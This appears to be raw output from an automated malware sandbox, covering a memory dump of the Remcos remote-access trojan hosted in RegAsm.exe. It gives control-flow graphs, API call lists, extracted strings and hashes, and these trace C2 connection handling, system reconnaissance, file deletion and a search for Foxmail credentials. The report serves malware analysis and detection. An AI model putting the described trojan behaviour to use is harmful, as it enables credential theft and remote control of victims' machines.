                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$FileSystem
                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                        • API String ID: 2086374402-595813830
                                                                                                                                        • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                        • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                                                                        • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                        • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                                                                        APIs
                                                                                                                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                                                                                        • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Name$ComputerUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4229901323-0
                                                                                                                                        • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                        • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                                                                        • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                        • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                        • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                                                                        • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                        • Instruction Fuzzy Hash:

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 93 40ef2c 89->93 94 40ec57 90->94 95 40ec59-40ec65 call 41b354 90->95 93->49 94->95 105 40ec67-40ec69 95->105 106 40ec6e-40ec72 95->106 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 105->106 108 40ecb1-40ecc4 call 401e65 call 401fab 106->108 109 40ec74 call 407751 106->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 142 40ec9c-40eca2 120->142 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 142->108 143 40eca4-40ecaa 142->143 143->108 146 40ecac call 40729b 143->146 146->108 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 191 40ee59-40ee7d call 40247c call 434829 183->191 184->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                                                                          • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                        • String ID: 8SG$8SG$@0O$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-8AXK3L$Software\$User$`xO$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                                        • API String ID: 2830904901-4123902848
                                                                                                                                        • Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                                                                                                        • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                                                                        • Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                                                                                                        • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 613 415220-415246 call 402093 * 2 call 41b580 606->613 614 41524b-415260 call 404f51 call 4048c8 606->614 630 415ade-415af0 call 404e26 call 4021fa 607->630 613->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 614->629 614->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 642 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->642 643 415b18-415b20 call 401e8d 630->643 642->643 643->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                                                                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                                                        • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                        • String ID: | $%I64u$5.1.3 Pro$8SG$8}O$@0O$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-8AXK3L$TLS Off$TLS On $`xO$dMG$hlight$name$NG$NG$PG$PG$PG
                                                                                                                                        • API String ID: 524882891-3476964242
                                                                                                                                        • Opcode ID: 8eec2c691427c46707f38074d2631b5f8e9ad24c24841cd07b2db5240619491e
                                                                                                                                        • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                                                                        • Opcode Fuzzy Hash: 8eec2c691427c46707f38074d2631b5f8e9ad24c24841cd07b2db5240619491e
                                                                                                                                        • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1094 412e43-412e5f call 401f04 call 41c516 1091->1094 1092->1094 1100 412e61-412e73 call 401f04 DeleteFileW 1094->1100 1101 412e79-412e7b 1094->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1105 412e99-412eab call 406b63 1103->1105 1104->1103 1107 412e81-412e86 1104->1107 1110 412f01-412f20 call 401f09 * 3 1105->1110 1111 412ead-412ebb call 406b63 1105->1111 1107->1103 1107->1105 1122 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1122 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1123 412ecd-412ef9 Sleep call 401f09 * 3 1117->1123 1138 412f63-412f89 call 401f09 call 405b05 1122->1138 1123->978 1136 412eff 1123->1136 1136->1122 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                        • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                                                        • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                                                        • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                                                        • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                        • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                                                        • API String ID: 1223786279-2576077980
                                                                                                                                        • Opcode ID: eaa2c7ded2fb993fb69df274429c638ebd8ce54d64ed8dcd9df39e74ccc7a972
                                                                                                                                        • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                                                                        • Opcode Fuzzy Hash: eaa2c7ded2fb993fb69df274429c638ebd8ce54d64ed8dcd9df39e74ccc7a972
                                                                                                                                        • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                          • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                          • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                          • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                          • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                        • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                        • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                        • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                        • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                        • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                        • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                        • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                        • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                        • String ID: )$Foxmail$ProgramFiles
                                                                                                                                        • API String ID: 672098462-2938083778
                                                                                                                                        • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                        • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                        • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                        • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1286 414dc1-414dfd 1287 414e03-414e18 GetSystemDirectoryA 1286->1287 1288 414f18-414f23 1286->1288 1289 414f0e 1287->1289 1290 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1287->1290 1289->1288 1295 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1290->1295 1296 414e6c-414e76 GetProcAddress 1290->1296 1309 414f0a-414f0d 1295->1309 1310 414ebd-414ec7 GetProcAddress 1295->1310 1297 414e78-414e7b FreeLibrary 1296->1297 1298 414e7d-414e7f 1296->1298 1297->1298 1298->1295 1300 414ed2 1298->1300 1303 414ed4-414ee5 GetProcAddress 1300->1303 1305 414ee7-414eeb 1303->1305 1306 414eef-414ef2 FreeLibrary 1303->1306 1305->1303 1307 414eed 1305->1307 1308 414ef4-414ef6 1306->1308 1307->1308 1308->1309 1311 414ef8-414f08 1308->1311 1309->1289 1312 414ec9-414ecc FreeLibrary 1310->1312 1313 414ece-414ed0 1310->1313 1311->1309 1311->1311 1312->1313 1313->1300 1313->1309
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
